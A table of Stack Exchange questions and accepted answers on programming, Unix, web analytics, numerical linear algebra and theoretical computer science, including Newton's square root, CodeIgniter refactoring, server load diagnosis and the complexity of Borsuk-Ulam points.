id | question | title | tags | accepted_answer
---|---|---|---|---
_codereview.43456 | I designed a program that calculates the square root of a number using Newton's method of approximation that consists of taking a guess (g) and improving it (improved_guess = (x/g + g)/2) until you can't improve it anymore: #include <iostream> #include <iomanip> using namespace std; template <class Y> Y sqrt (Y x) { double g (1), ng; while (true) { ng = (x/g + g)/2; if (g != ng) g = ng; else if (g == ng) break; } return g; } void menu() { double x, g; string a = ""; do { cout << "Enter a number to get the sqrt of: "; cin >> x; g = sqrt(x); cout << "The result is: " << setprecision(100) << g << endl; cout << "Result^2 = " << setprecision(100) << g*g << endl; cout << "\nDo it again ? <y/n> "; cin >> a; cout << endl; } while (a == "y"); } int main() { menu(); return 0; } Can you see any way to improve this? Like in the "do it again" part, I just couldn't use y/n... | Square root approximation with Newton's method | c++;mathematics | Good comments have been posted already but no one explicitly pointed out that the if (g == ng) doesn't bring anything to the function, and: while (true) { double ng = (x/g + g)/2; if (g != ng) g = ng; else if (g == ng) break; } return g; can be written: while (true) { double ng = (x/g + g)/2; if (g != ng) g = ng; else break; } return g; or even better: double g (1); while (true) { double ng = (x/g + g)/2; if (g == ng) break; g = ng; } return g; which can just as easily be written: while (true) { double ng = (x/g + g)/2; if (g == ng) return g; g = ng; } |
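The accepted answer's final loop translates directly to other languages. Below is a minimal Python sketch of the same fixed-point iteration (the function name `newton_sqrt` is my own), with one extra guard the C++ version lacks: in floating point the iteration can end up alternating between two neighbouring values instead of reaching an exact fixed point, so the sketch also stops when the new guess repeats the previous-but-one value.

```python
def newton_sqrt(x: float) -> float:
    """Square root by Newton's method: iterate g <- (x/g + g)/2 until the
    guess stops improving at machine precision."""
    if x < 0:
        raise ValueError("cannot take the square root of a negative number")
    if x == 0:
        return 0.0
    g, prev = 1.0, 0.0
    while True:
        ng = (x / g + g) / 2
        if ng == g or ng == prev:  # fixed point, or a 1-ulp oscillation
            return ng
        prev, g = g, ng

print(newton_sqrt(9.0))  # 3.0
```

The equality-based stopping test is the answer's own idea; the `ng == prev` clause is the only addition, and it is what keeps the loop from spinning forever on inputs where the iteration settles into a two-value cycle.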
_unix.204228 | So... ls -l --block-size=MB tells me that the directory is one MB. ls -l --block-size=MB directory tells me there's a 3MB file inside the directory. Shouldn't that make the directory at least 3MB? How can the directory be smaller than its contents? | ls - why is parent directory smaller than its contents? How to see the size of directory's contents? | filesystems | No, because the contents of the first directory itself are only 1MB. If you want something that will sum all the sizes in the directory tree under a directory, you want du. ls doesn't recurse into subdirectories as a normal matter of course. It just reports on the things that are directly in the location you are looking at. So in your first directory, if you add up all the sizes of just the things directly in that directory, it can be less than the sizes of the things in a subdirectory. But ls didn't look in that subdirectory, so it doesn't know anything about them when it generates its listing for you. |
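The answer's distinction (ls reports only a directory's direct entries, while du sums the whole tree) can be mimicked with a few lines of Python. This is only a sketch of the summing behaviour: it counts apparent file sizes, not the allocated disk blocks that du actually reports.

```python
import os

def tree_size(path):
    """Total apparent size of all regular files under path, recursively --
    the du-like sum, as opposed to ls listing one level only."""
    total = 0
    for dirpath, _dirnames, filenames in os.walk(path):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):  # skip symlinks, as du does by default
                total += os.path.getsize(full)
    return total
```

A directory whose own entries are tiny can still have a large `tree_size`, which is exactly the situation described in the question.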
_codereview.167367 | I have a model Sachbearbeiter that has a OneToOneField to the User model in django.contrib.auth.class Sachbearbeiter(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE) ...I created a view to enable certain people to create a new Sachbearbeiter. There are three things that need to be done:When a Sachbearbeiter is created, a corresponding User must be created automatically.The Sachbearbeiter.user must point to the corresponding User automaticallly.When a User is created, the username must match the given email address.I implemented this in my view.def sachbearbeiter_create(request): user_form = UserForm(request.POST or None) sachbearbeiter_form = SachbearbeiterForm(request.POST or None) if request.method == 'POST': if user_form.is_valid() and sachbearbeiter_form.is_valid(): user = user_form.save(commit=False) user.username = user.email user.save() sachbearbeiter = sachbearbeiter_form.save(commit=False) sachbearbeiter.user = user sachbearbeiter.save() ... return render(request, 'sachbearbeiter/detail_neu.html', {'user_form': user_form, 'sachbearbeiter_form': sachbearbeiter_form})And those are the forms:class SachbearbeiterForm(ModelForm): class Meta: model = Sachbearbeiter fields = [verein, ]class UserForm(ModelForm): class Meta: model = User fields = [first_name, last_name, email] def __init__(self, *args, **kwargs): self.base_fields['first_name'].required = True self.base_fields['last_name'].required = True self.base_fields['email'].required = True super(UserForm, self).__init__(*args, **kwargs)I have two questions:I have the feeling there is a better way to create to instances and link them to each other, than what I did in the view. Are there any improvements I could do?Is the view really the right place to implement that logic? | Create Django objects on the fly. Better way to do it? And is the view the best place? | python;django | null |
_cstheory.38590 | This problem is probably known under some other name, if anyone has seen it before, a reference will be great.Given $n,m,k$ (for $m,k\ll n$), a $(n,m,k)$ separating set is a set of $n$-sized binary vectors $V$ such that for every disjoint $S,S'\subset \{1,\ldots,n\}$, $|S|=m,|S'|=k$ there exists $v\in V: v_{|S}=0, v_{|S'}=1$.That is, for every set of $m$ indices $S$ and a non-overlapping set of $k$ indices $S'$, there should be a vector whose $S$ entries are all zeros and his $S'$ entries are all ones.The goal is to construct a small set $V$ with the above properties.Is this problem known? Are there known deterministic constructions of such $V$? What is the minimal size of such $V$? What about a lower bound?It seems that it is easy to build $V$ randomly (which would yield $|V|=O(2^{m+k}(m+k)\log n)$ by choosing uniformly distributed i.i.d. vectors).The $2$ at the base of the exponent can be improved if $m\neq k$ by setting each bit with probability $k/(m+k)$.Is this an optimal construction? | How to construct an $(n,m,k)$ ``separating set''? | ds.algorithms;co.combinatorics;extremal combinatorics | null |
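The randomized construction sketched in the question is easy to prototype and, for tiny parameters, to verify exhaustively. The code below is an illustration of that construction only (all names are mine): it draws i.i.d. vectors with bit probability k/(m+k) and brute-forces the separation property, which is feasible only for very small n, m, k.

```python
import itertools
import random

def random_separating_set(n, m, k, max_vectors=2000, seed=0):
    """Sample i.i.d. n-bit vectors (each bit 1 with prob. k/(m+k)) until the
    family is (n, m, k)-separating, verified by brute force over all disjoint
    index sets S (|S| = m) and S' (|S'| = k).  Tiny parameters only."""
    rng = random.Random(seed)
    p = k / (m + k)
    vectors = []

    def separated(S, Sp):
        # some vector is all-0 on S and all-1 on S'
        return any(all(v[i] == 0 for i in S) and all(v[j] == 1 for j in Sp)
                   for v in vectors)

    def is_separating():
        for S in itertools.combinations(range(n), m):
            rest = [i for i in range(n) if i not in S]
            for Sp in itertools.combinations(rest, k):
                if not separated(S, Sp):
                    return False
        return True

    while len(vectors) < max_vectors:
        vectors.append(tuple(int(rng.random() < p) for _ in range(n)))
        if is_separating():
            return vectors
    return None  # give up: unlucky run or parameters too demanding

V = random_separating_set(5, 2, 1)
print(len(V))  # typically a few dozen vectors for these parameters
```

The size of the family found this way matches the flavour of the question's bound: the number of (S, S') pairs grows like n^(m+k), and each random vector separates a fixed pair with constant probability, so a coupon-collector argument gives the O(2^(m+k)(m+k) log n) count.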
_webmaster.11650 | One of my sites is a single page that focuses on getting the user to call a phone number.In GA, I've set up a Goal for when visitors spend more than 1 minute on the site. I realized much later that GA doesn't trap exit events, so visitors who arrive at the site and click back won't be counted. I'd like to modify that; but that's for another question.I've got a number of users with an Average Time on Site >0 ; and a page depth > 1. I can't figure out how --- My site contains a single page. The number of users with Page Depth 2+ doesn't equal the number of returning visitors - otherwise I'd assume these are people who left and then typed in the url manually.I'm at a loss. Did they just hit refresh? Did they bookmark the site and return to it? (That shouldn't count as 'time on site' though'...) | How do I have a page depth > 1 on a single page website? | google analytics;analytics | Page depth does not take into account unique pageviews, just total pageviews. So, yes, if your end user refreshes the page in any way, it'll count as a two-page visit. If they bookmark the page and return to it a few hours later, its a new visit, and doesn't alter the previous visit's page depth. |
_codereview.10574 | I used this code on my own site and now trying to transfer it to my new site which uses codeigniter. I'm not sure how I can eliminate some of this code and still maintain its purpose and functionality with merging it into my controller, model, and library.<div id=headerCharacter> <?php if ($access_level_id == 2 || $access_level_id == 3) { $query = SELECT characters.id FROM characters; $result = mysqli_query ($dbc,$query); $total_num_characters = mysqli_num_rows($result); $query = SELECT user_characters.id FROM user_characters INNER JOIN user_accounts ON user_accounts.id = user_characters.user_id; } else { $query = SELECT user_characters.id FROM user_characters INNER JOIN user_accounts ON user_accounts.id = user_characters.user_id WHERE user_accounts.id = '.$user_id.'; } $result = mysqli_query($dbc,$query); $num_available_characters = mysqli_num_rows($result); if (($num_available_characters > 1) || (($access_level_id == 2 || $access_level_id == 3) && (isset($total_num_characters)) && ($total_num_characters > 0))) { ?> <form method=POST id=change_default_character> <select class=dropdown name=new_default_character_id id=new_default_character_id title=Select Character> <?php if ($default_character_id > 0) { print <option value=.$default_character_id.>.$default_character_name; } else { print <option value=0>- Select -; } if ($access_level_id == 2 || $access_level_id == 3) { $query = SELECT characters.id, characters.character_name FROM characters WHERE characters.id <> '.$default_character_id.' AND characters.status_id = '1' ORDER BY characters.character_name; } else { $query = SELECT characters.id, characters.character_name FROM characters INNER JOIN user_characters ON characters.id = user_characters.character_id INNER JOIN user_accounts ON user_accounts.id = user_characters.user_id WHERE user_accounts.id = '.$user_id.' AND user_characters.character_id <> '.$default_character_id.' 
AND characters.status_id = '1' ORDER BY characters.character_name; } $result = mysqli_query ($dbc,$query); $num_rows = mysqli_num_rows ($result); if ($num_rows > 0) { if ($access_level_id == 2 || $access_level_id == 3) { print <optgroup label=\** Active Characters **\>; } while ( $row = mysqli_fetch_array ( $result, MYSQL_ASSOC ) ) { print <option value=\.$row['id'].\>.$row['character_name'].</option>\r; } } if ($access_level_id == 2 || $access_level_id == 3) { $query = SELECT characters.id, characters.character_name FROM characters WHERE characters.id <> '.$default_character_id.' AND characters.status_id = '2' ORDER BY characters.character_name; } else { $query = SELECT characters.id, characters.character_name FROM characters LEFT JOIN user_characters ON characters.id = user_characters.character_id LEFT JOIN user_accounts ON user_accounts.id = user_characters.user_id WHERE user_accounts.id = '.$user_id.' AND user_characters.character_id <> '.$default_character_id.' AND characters.status_id = '2' ORDER BY characters.character_name; } $result = mysqli_query ($dbc,$query); $num_nows = mysqli_num_rows($result); if ($num_rows > 0) { print <optgroup label=\** Inactive Characters **\>; while ( $row = mysqli_fetch_array ( $result, MYSQL_ASSOC ) ) { print <option value=\.$row['id'].\>.$row['character_name'].</option>\r; } } ?> </select> </form> <?php } else { print <h1>.$default_character_name.</h1>\n; } ?> </div>EDIT :If user role is a user or editor then either display their default character or if more than one character then display dropdown of all handled characters. 
If user role is an administrator or webmaster then display their default character or ALL characters.Displays Active (status-1), Inactive(status-2), Injured(status-3, Alumni(status-4) in separate option groupsController: $this->data['userRoster'] = $this->kowauth->getRosterList($this->data['userData']->usersRolesID);Library:/** * Get roster list * * @param integer * @return object/NULL */function getRosterList($usersRolesID){if (($usersRolesID == 4) || ($usersRolesID == 5)){ return $this->ci->users->getAllRoster();} else{ return $this->ci->users->getRosterByUserID($this->ci->session->userdata('usersID'));}}Model:/*** Get roster list** @return object/NULL*/function getAllRoster(){ $this->db->select('rosterName');$this->db->from('rosterList');$this->db->order_by('rosterName');$query = $this->db->get();if ($query->num_rows() > 0) { return $query->result();}return null;}/*** Get list of roster by user ID** @return object/NULL*/function getRosterByUserID($usersID){$this->db->select('rosterName');$this->db->from('rosterList');$this->db->where('userID', $usersID);$this->db->order_by('rosterName');$query = $this->db->get();if ($query->num_rows() > 0) { return $query->result();}return null;} | Updating Old Code Into Code Igniter Use | php;codeigniter | First, you should really use prepared statements instead of stuff like user_accounts.id = '.$user_id.';: this will avoid security issues. Let's look at your actual question now.I'd advise you to go through the CodeIgniter officiel tutorial which will help you to understand how Models, Views and Controllers relate to each other. You should remember that they only exist to help you to organise your code in order to avoid a huge mess full of inline SQL queries and HTML code which can get out of control easily.This means you can start by putting your code in a controller function, and refactor iteratively to get a nice, easy to understand code after a few steps. 
A few rules of thumb to know where to put your code: Conditional logic (e.g. if ($access_level_id == 2 || $access_level_id == 3)) should stay in the controller. This is what tells the application "do this only in this case, and that in this other case". SQL queries should all go in the model. Your queries could go in one single method if they mean the same thing; parameters to this method will help you differentiate the actual SQL queries. HTML code should only be produced in the view. The view should only display content, not retrieve data or use logic. To wrap it up, this means that the first code to get executed is in the controller. Depending on the user session and parameters, it could need to modify the database (e.g. add a new user). It should ask the model to do this. It can also ask the model for some other unrelated data, and pass it up to the view which is going to display it. |
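The prepared-statements point at the top of the answer deserves a concrete illustration. CodeIgniter's query bindings do this for you; the same mechanism in Python's sqlite3 (table and data invented for the example) shows why a bound value can never change the query's structure:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE user_characters (user_id INTEGER, character_name TEXT)")
conn.executemany("INSERT INTO user_characters VALUES (?, ?)",
                 [(1, "Alice"), (2, "Bob")])

hostile = "1 OR 1=1"  # concatenated into the SQL text, this would match every row

# The placeholder keeps the input as a value, never as SQL:
rows = conn.execute(
    "SELECT character_name FROM user_characters WHERE user_id = ?", (hostile,)
).fetchall()
print(rows)  # [] -- the whole string is compared as one value, matching nothing

rows = conn.execute(
    "SELECT character_name FROM user_characters WHERE user_id = ?", (1,)
).fetchall()
print(rows)  # [('Alice',)]
```

The original view's string splices such as `user_accounts.id = '.$user_id.'` are exactly the unsafe pattern; CodeIgniter's `$this->db->where('userID', $usersID)` in the model already binds the value safely.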
_unix.179188 | Load is high.This is my toptop - 04:08:52 up 15 days, 15:14, 1 user, load average: 99.09, 107.09, 117.35Tasks: 998 total, 125 running, 827 sleeping, 1 stopped, 45 zombieCpu(s): 13.4%us, 75.1%sy, 0.0%ni, 11.3%id, 0.0%wa, 0.0%hi, 0.2%si, 0.0%stMem: 65951648k total, 65390852k used, 560796k free, 5023756k buffersSwap: 4194300k total, 262684k used, 3931616k free, 39846488k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND14904 nobody 20 0 151m 50m 2508 R 15.4 0.1 11:12.89 httpd 1769 root 20 0 0 0 0 R 15.1 0.0 355:06.40 kondemand/22 1778 root 20 0 0 0 0 S 14.8 0.0 345:52.47 kondemand/31 1767 root 20 0 0 0 0 S 14.4 0.0 353:41.57 kondemand/20 1766 root 20 0 0 0 0 S 13.8 0.0 374:52.13 kondemand/1915188 newgames 20 0 0 0 0 Z 13.8 0.0 0:00.42 php <defunct> 1772 root 20 0 0 0 0 R 13.4 0.0 337:16.18 kondemand/25 1775 root 20 0 0 0 0 S 13.4 0.0 352:11.24 kondemand/2811857 mailnull 20 0 71640 1408 752 S 12.8 0.0 0:39.47 exim15180 hearsttr 20 0 179m 10m 6020 R 12.8 0.0 0:00.39 php20980 nobody 20 0 151m 50m 2084 R 12.8 0.1 12:14.03 httpd 1755 root 20 0 0 0 0 S 12.5 0.0 364:43.87 kondemand/8 1764 root 20 0 0 0 0 R 12.5 0.0 342:25.04 kondemand/1715161 hearsttr 20 0 0 0 0 Z 12.5 0.0 0:00.38 php <defunct> 1756 root 20 0 0 0 0 R 12.1 0.0 352:29.80 kondemand/9 1771 root 20 0 0 0 0 R 12.1 0.0 349:01.36 kondemand/2415138 hearsttr 20 0 0 0 0 Z 12.1 0.0 0:00.37 php <defunct> 1757 root 20 0 0 0 0 S 11.8 0.0 368:19.92 kondemand/10 1773 root 20 0 0 0 0 S 11.8 0.0 355:11.04 kondemand/2615174 newgames 20 0 0 0 0 Z 11.8 0.0 0:00.36 php <defunct>15440 nobody 20 0 151m 50m 2080 R 11.8 0.1 10:13.40 httpd 1760 root 20 0 0 0 0 R 11.5 0.0 368:08.78 kondemand/13 1765 root 20 0 0 0 0 S 11.5 0.0 358:25.81 kondemand/1815817 nobody 20 0 151m 50m 2112 R 11.5 0.1 12:15.94 httpd15194 hearsttr 20 0 187m 12m 5820 S 11.1 0.0 0:00.34 php15217 hearsttr 20 0 0 0 0 Z 10.8 0.0 0:00.33 php <defunct>15226 newgames 20 0 0 0 0 Z 10.8 0.0 0:00.33 php <defunct> 1219 nobody 20 0 151m 50m 2084 R 10.5 
0.1 2:26.14 httpd 1758 root 20 0 0 0 0 S 10.5 0.0 375:39.42 kondemand/11 1759 root 20 0 0 0 0 R 10.5 0.0 364:42.21 kondemand/12 1763 root 20 0 0 0 0 S 10.5 0.0 355:34.66 kondemand/16 1770 root 20 0 0 0 0 S 10.5 0.0 350:08.17 kondemand/23 6111 nobody 20 0 151m 50m 2508 R 10.5 0.1 9:23.07 httpd14425 nobody 20 0 151m 50m 2208 S 10.5 0.1 11:37.53 httpd15085 nobody 20 0 151m 50m 2508 R 10.5 0.1 11:11.37 httpd15228 sexsmovi 20 0 188m 12m 5820 S 10.5 0.0 0:00.32 php15378 nobody 20 0 151m 50m 2508 S 10.5 0.1 11:46.37 httpd15522 nobody 20 0 151m 50m 2196 S 10.5 0.1 10:54.56 httpd16446 nobody 20 0 151m 50m 2988 S 10.5 0.1 11:12.03 httpd16962 nobody 20 0 151m 50m 2196 S 10.5 0.1 11:05.68 httpd18266 nobody 20 0 151m 50m 2084 S 10.5 0.1 11:41.40 httpd18334 nobody 20 0 151m 50m 2468 S 10.5 0.1 10:39.56 httpd18774 nobody 20 0 151m 50m 2092 S 10.5 0.1 11:00.09 httpd 817 nobody 20 0 151m 51m 2992 S 10.2 0.1 10:09.30 httpd 1882 nobody 20 0 151m 50m 2844 S 10.2 0.1 11:40.74 httpd14523 nobody 20 0 151m 50m 3000 S 10.2 0.1 11:30.28 httpd14900 nobody 20 0 151m 50m 2080 S 10.2 0.1 10:38.68 httpd14919 nobody 20 0 151m 50m 2540 S 10.2 0.1 11:33.35 httpd15178 nobody 20 0 151m 50m 2508 S 10.2 0.1 11:35.48 httpd15223 romanced 20 0 0 0 0 Z 10.2 0.0 0:00.31 php <defunct>15251 nudeteen 20 0 184m 9.9m 5204 R 10.2 0.0 0:00.31 php15259 investgr 20 0 184m 9884 5164 R 10.2 0.0 0:00.31 php15460 nobody 20 0 151m 50m 2076 S 10.2 0.1 12:09.73 httpd15944 nobody 20 0 151m 50m 2092 R 10.2 0.1 11:27.52 httpd16168 nobody 20 0 151m 50m 2508 S 10.2 0.1 11:40.34 httpd16736 nobody 20 0 151m 50m 2968 R 10.2 0.1 11:42.38 httpd17367 nobody 20 0 151m 50m 2228 S 10.2 0.1 10:32.59 httpd17438 nobody 20 0 151m 50m 2540 S 10.2 0.1 10:54.28 httpd17882 nobody 20 0 151m 50m 2980 S 10.2 0.1 11:12.86 httpdNotice that 75% of the CPU is used by system instead of users. 
I wonder what they do?root@host [~]# iostat -xk 5Linux 2.6.32-504.el6.x86_64 (host.buildingsuperteams.com) 01/14/2015 _x86_64_ (32 CPU)avg-cpu: %user %nice %system %iowait %steal %idle 6.75 0.03 13.14 0.02 0.00 80.06Device: rrqm/s wrqm/s r/s w/s rkB/s wkB/s avgrq-sz avgqu-sz await svctm %utilsda 0.27 132.84 1.38 37.44 17.17 1371.08 71.52 0.42 10.77 0.69 2.67sdb 0.05 38.16 0.51 29.32 12.26 273.27 19.14 0.19 6.32 0.32 0.94iostat doesn't show any excessive usage of the ssdrunning iftop doesn't seem show the net to be the bottle neck.Something is running on system but what?On my other server some suggestYour server has a high load because of how you have Apache configured, as each new php access opens a new process.I enable Apache keepalive for this vhost and it seems to be a lowering the load.I wonder where I can learn more about it.Here is some info on the 16 core cpuroot@host [~]# grep -E '^model name|^cpu MHz' /proc/cpuinfomodel name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 1400.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD 
Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000model name : AMD Opteron(TM) Processor 6272cpu MHz : 2100.000 | My load is high. Top is strange. IOStats show low load | load | null |
_scicomp.10718 | Suppose I have a symmetric matrix $A_{1000\times 1000}$, which can be represented by:$A = J G J^T$where $J$ in 1000x3 is full column rank dense matrix; $G$ in 3x3 is a nonsingular dense matrix.What is the fastest way to obtain ONLY the maximum eigenvalue of $A$?I know that the eigenvalue problem of symmetric matrix can be faster than that of general dense matrix, but can the following features of the problem make it even faster ?only the maximum eigenvalue of $A$ is needed;$A = J G J^T$, rank($A$) = 3, and $A$ has only 3 nonzero eigenvaluesCan $LDL^T$ decomposition work any good? I would prefer to implement it via Eigen C++.Does $B=J^TJG$ has the same nonzero eigenvalues as $A$? | What is the most efficient way to obtain the max eigenvalue of a specific symmetric matrix via Eigen C++ | c++;matrix;eigenvalues;eigen;symmetry | We have the matrix $A$ that can be expressed as$A = JGJ^T$.The first thing is to calculate the QR decomposition of matrix $J$. Because of the low rank of the matrix it can be done very fast with, for instance, modified Gram Schmidt algorithm. Now we can write $A$ as$A = QR G R^TQ^T$,where $Q$ is an orthonormal matrix ($Q^T Q = I$). We define $F$ as follows$F = R G R^T$,where $F$ is a $3\times3$ matrix. here the eigenvalues of $F$ will be the same than the ones of your original matrix $A$. But you probably want to calculate also the eigenvectors of $A$, so we continue.Calculate the eigen decomposition of $F$:$F = XDX^T$,where $D$ is a diagonal matrix, and $X$ is orthonormal ($X^T X = I$). Then, inserting that expression for $F$ in the formula for $A$ we obtain$A = QXDX^TQ^T$,that can be rewritten as$A = YDY^T$,.So $Y = QX$ is a orthonormal matrix whose columns are the eigenvectors of $A$, and $D$ is the diagonal matrix with the eigenvalues of $A$. It is unique except for the ordering of the columns of $Y$ and $D$. |
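The last sub-question (whether $B = J^T J G$ shares the nonzero eigenvalues of $A$) is left open in the answer; a short argument using only the given shapes suggests the answer is yes, which gives another route to the maximum eigenvalue via a $3\times 3$ problem:

```latex
\text{If } A v = \lambda v \text{ with } \lambda \neq 0, \text{ set } w = J^T v. \text{ Then}
\quad B w = (J^T J G)\, J^T v = J^T (J G J^T) v = J^T A v = \lambda w,
\quad\text{and } w \neq 0 \text{ since } J G w = J G J^T v = A v = \lambda v \neq 0.
```

Conversely, if $Bw = \lambda w$ with $\lambda \neq 0$, then $v = JGw$ satisfies $Av = JG(J^TJG)w = JG\,Bw = \lambda v$, and $v \neq 0$ because $J^T v = Bw = \lambda w \neq 0$. So the nonzero spectra of $A$ and $B$ coincide, and the largest eigenvalue of $A$ (when it is the largest in magnitude) can be read off the small matrix $J^TJG$; note, though, that $B$ is generally not symmetric, unlike the $F = RGR^T$ of the QR route.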
_codereview.111760 | I come from a PHP object oriented framework background (Laravel, Symfony, Silex...). With that, validation comes in pre-built classes mechanism in a framework that validates for you parameters that you define and validates against. If it fails validation, you don't proceed.Example from Laravel: public function store(Request $request) { $validator = Validator::make($request->all(), [ 'title' => 'required|unique:posts|max:255', 'body' => 'required', ]); if ($validator->fails()) { return redirect('post/create') ->withErrors($validator) ->withInput(); } // Store the blog post... }Here, we define that it is required, max 255 for title. It is easy to read.Symfony is a bit more elaborate but still easy to read due to easily predefined class:public static function loadValidatorMetadata(ClassMetadata $metadata){ $metadata->addPropertyConstraint('firstName', new Assert\NotBlank()); $metadata->addPropertyConstraint( 'firstName', new Assert\Length(array(min => 3)) );}I'm starting to dive into node.js with express.js as base to create an API (I'm aware that Restify and Loopback exist). Currently I have one end point, which I would like to validate a hash token to identify the client, and then inspect that the stored key/value pair matches. 
The storage is from redis, the following is the code:/** * Check if the hash is in redis * @function CheckParam * @param {object} req - json object with the data that will be inserted in queries * @param cb - callback * @callback {object} status code */http.checkParam = function CheckParam(req, cb) { if (typeof req.body.data !== 'undefined' && req.body.data && typeof req.query.hash !== 'undefined' && req.query.hash && typeof req.body.id !== 'undefined' && req.body.id) { if (typeof req.body.data !== 'object' && typeof req.query.hash !== 'string' && typeof req.body.id !== 'number') { log.error({part: 'save'}, 'Wrong parameters type'); cb(403); } else { redis.get(req.query.hash, function (err, data) { if (err) { log.error({part: 'save'}, 'Error from redis \n ' + err); cb(403); } else if (!data) { log.error({part: 'save'}, 'Token not found \n ' + req.query.hash); cb(403); } else { try { var obj = JSON.parse(data); if (obj.member.id == req.body.id) { cb(200); } else { log.error({part: 'save'}, 'Wrong user id ' + req.body.id); cb(403); } } catch (e) { log.error({part: 'save'}, 'Error from redis \n ' + e); cb(403); } } }); } } else { log.error({part: 'save'}, 'Connection refused'); cb(403); }};Is there a more elegant way to validate parameters received from client similar to the above syntax from PHP but in node.js. I reverted to basic if && in order to check 2 simple parameter, but as you can see, it is extensive. | API to verify whether a Redis entry exists | javascript;beginner;node.js;express.js;redis | null |
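The flat `if`/`&&` checks at the top of `checkParam` can be replaced by a small declarative rules table, which is the shape that Express validation middleware such as express-validator provides. A hand-rolled sketch of the idea, written in Python for brevity (the structure carries over to JavaScript directly; all names are mine):

```python
def validate(data, rules):
    """Check each field against (required, expected_type) and collect error
    strings instead of nesting if-statements; an empty list means valid."""
    errors = []
    for field, (required, expected_type) in rules.items():
        value = data.get(field)
        if value is None:
            if required:
                errors.append(f"{field} is required")
        elif not isinstance(value, expected_type):
            errors.append(f"{field} must be of type {expected_type.__name__}")
    return errors

rules = {
    "data": (True, dict),   # req.body.data must be an object
    "hash": (True, str),    # req.query.hash must be a string
    "id":   (True, int),    # req.body.id must be a number
}
print(validate({"hash": "abc", "id": "7"}, rules))
# ['data is required', 'id must be of type int']
```

With the parameter checks factored out this way, the handler body shrinks to the Redis lookup plus one `if errors: cb(403)` guard, much closer to the Laravel/Symfony style quoted in the question.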
_webmaster.103330 | My client is using godaddy to host a php site, and has recently signed up for google apps account for email, hoping it will help stop his automated emails from getting rejected as spam. The code sends emails using the phpmailer class. What changes do I need to make so that the email will be sent out through google instead of through godaddy? Is it a code change? Or do I need to set up mx records somewhere? How can I tell which server is actually sending the email | how can i send email in php through google apps | php;email;godaddy;google apps | MX Record will not automatically send email from your server. You need to make some CODE change. Check this answer if you want to do it with PHPMailer.$mail = new PHPMailer;// Tell PHPMailer to use SMTP$mail->isSMTP();// Enable SMTP debugging// 0 = off (for production use)// 1 = client messages// 2 = client and server messages$mail->SMTPDebug = 2;// Ask for HTML-friendly debug output$mail->Debugoutput = 'html';// Set the hostname of the mail server$mail->Host = 'smtp.gmail.com';// use// $mail->Host = gethostbyname('smtp.gmail.com');// if your network does not support SMTP over IPv6// Set the SMTP port number - 587 for authenticated TLS, a.k.a. RFC4409 SMTP submission$mail->Port = 587;// Set the encryption system to use - ssl (deprecated) or tls$mail->SMTPSecure = 'tls';// Whether to use SMTP authentication$mail->SMTPAuth = true;// Username to use for SMTP authentication - use full email address for gmail$mail->Username = [email protected];// Password to use for SMTP authentication$mail->Password = yourpassword;However, that solution has some problems of its own. The best way is to properly setup your mail server using DKIM and other settings, so that your emails don't go to spam. |
_cstheory.32202 | The Borsuk-Ulam theorem says that for every continuous odd function $g$ from an n-sphere into Euclidean n-space, there is a point $x_0$ such that $g(x_0)=0$. Simmons and Su (2002) describe a method to approximate the point $x_0$ using Tucker's lemma. However, it is not clear what the run-time complexity of their method is.Suppose we are given an oracle for the function $g$ and an approximation factor $\epsilon>0$. What is the run-time complexity (as a function of $n$) of:Finding a point $x$ such $|g(x)|<\epsilon$?Finding a point $x$ such that the $|x-x_0|<\epsilon$, when $x_0$ is a point satisfying $g(x_0)=0$? | The complexity of finding a Borsuk-Ulam point | approximation algorithms;time complexity;topology;algebraic topology | Papadimitriou showed that a version of this problem is PPAD-complete in the paper introducing that class, On the complexity of the parity argument and other inefficient proofs of existence.His formulation of the problem is:Borsuk-Ulam. Given an integer n and a Turing machine computing for each point $P=(x_1,\dots,x_d)$ with $-n\leq x_i\leq n$ and $\max_{|x_i|}=n$ (the surface of the $L_1$ sphere), a function $f(p)$ with $f(p) \leq \frac{1}{Kn}$. Find an $x$ with $|f(x) - f( - x)| \leq \frac{1}{n^2}$.(Sidenote -- many times when you see a fixed-point type of theorem, PPAD is a good guess for the complexity of finding it...) |
